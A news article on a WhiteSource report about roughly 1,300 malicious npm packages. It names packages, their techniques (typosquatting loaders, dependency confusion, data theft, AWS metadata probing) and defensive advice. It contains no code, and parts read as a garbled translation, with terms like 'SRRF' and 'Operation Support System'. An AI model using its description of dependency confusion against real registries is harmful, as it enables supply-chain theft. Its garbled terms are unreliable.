WhiteSource’s automated malware detection platform, WhiteSource Diffend, has a total of 1,300 malicious packages on NPM over a 6-month period through December 2021.
All malicious packages identified by WhiteSource were reported to NPM and subsequently removed from the package registry.
NPM has thus become a constant target of bad actors WhiteSource. A recent report published by WhiteSource states that 57% of attacks occur on three days of the week – Friday, Saturday and Sunday. Most of these (81.7%) are “reconnaissance” attacks, which consist of techniques in which attackers actively or passively gather information that can be used to aid in targeting. Another 14% of attacks aim to steal information such as login credentials and other sensitive details.
NPM attacks and their unique techniques
Some of the more recent malware detected by WhiteSource were:
- Mos-sass-loader and css-resources-loader: Packages designed to emulate the popular style-resource-loader and saas-loader NPM packages and inject malicious source code to download third-party info-stealers and also connections for remote establish code execution (RCE);
- Circle-admin-web-app and browser-warning-ui: packages containing malicious code designed to download OS-specific external packages containing malware to initiate RCE;
- Noopenpaint: A troll package with no malicious code that launches a few applications out of order and says “You have been hacked”;
- @grubhubprod_cookbook: the package exploits dependency confusion to specifically target Grubhub, intercepting data and sending it to a remote location;
- Azure-web-pubsub-express: a security research package with no malicious intent to collect system data and network interface details and send them to interactivesh.com;
- Reac1 and reect1: a pseudo-drill package masquerading as a research package that attempts to forward HTTP requests from the host system to webhook.com;
- Mrg-message-broker: similar to @grubhubprod_cookbook, uses dependency confusion to steal environment data;
- @sixt-web/api-client-sixt-v2-apps: another dependency confusion package that aggregates system data on installation;
- @maui-mf/app-auth: A potential Server Side Request Forgery (SRRF) attack package that performs detection of AWS metadata service instance roles and sends them to an external spoofed domain.
Most of these attacks fall under four malicious threat categories, including cryptomining, data theft, botnets, and security research. The security research packages are those that masquerade as security research programs but actually include Remote Code Execution (RCE) to gain full access to a host.
Other less malicious packages included script kiddies and SEO hacks. “Script kiddies are packages that don’t do any harm or collect data, but instead throw up worrying messages like ‘You’ve been hacked,'” said Maciej Mansfeld, senior project manager at WhiteSource. “Some packages also try to exploit the fact that NPM displays the README of packages in its online registry to build SEO for their online presence. We have seen online casinos and adult websites trying to take advantage of this.”
Dependency confusion poses a major threat
In particular, the report recommends caution with attacks aimed at exploiting dependency confusion in NPM and the fact that the majority of malicious code does not even need to be downloaded manually for the attack to work.
“A dependency confusion attack is a type of supply chain attack that occurs when a package manager is tricked into providing malicious code instead of the intended code,” says Mansfeld. “The most well-known method to exploit this vulnerability is through a package manager’s prioritization mechanism to deploy the latest versions.”
In such cases, if attackers successfully find an internal dependency package name, they can create a public package with the same name and a higher version number. The malicious public package is then preferred by the package manager and automatically installed when an update is invoked.
Here’s how to stay safe on NPM
The report recommends implementing a zero-trust policy on the system and only updating it when you are sure about the contents of a package; be aware of the environment and follow changes regularly; ongoing continuous integration (CI) in isolated phase; and keep a close eye on the SDLC (Software Development Life Cycle).
According to Mansfeld, it’s also a good hygiene routine for NPM end users to keep an eye out for packages downloading components removed during installation and to keep track of any OSS (Operation Support System) components used.
Copyright © 2022 IDG Communications, Inc.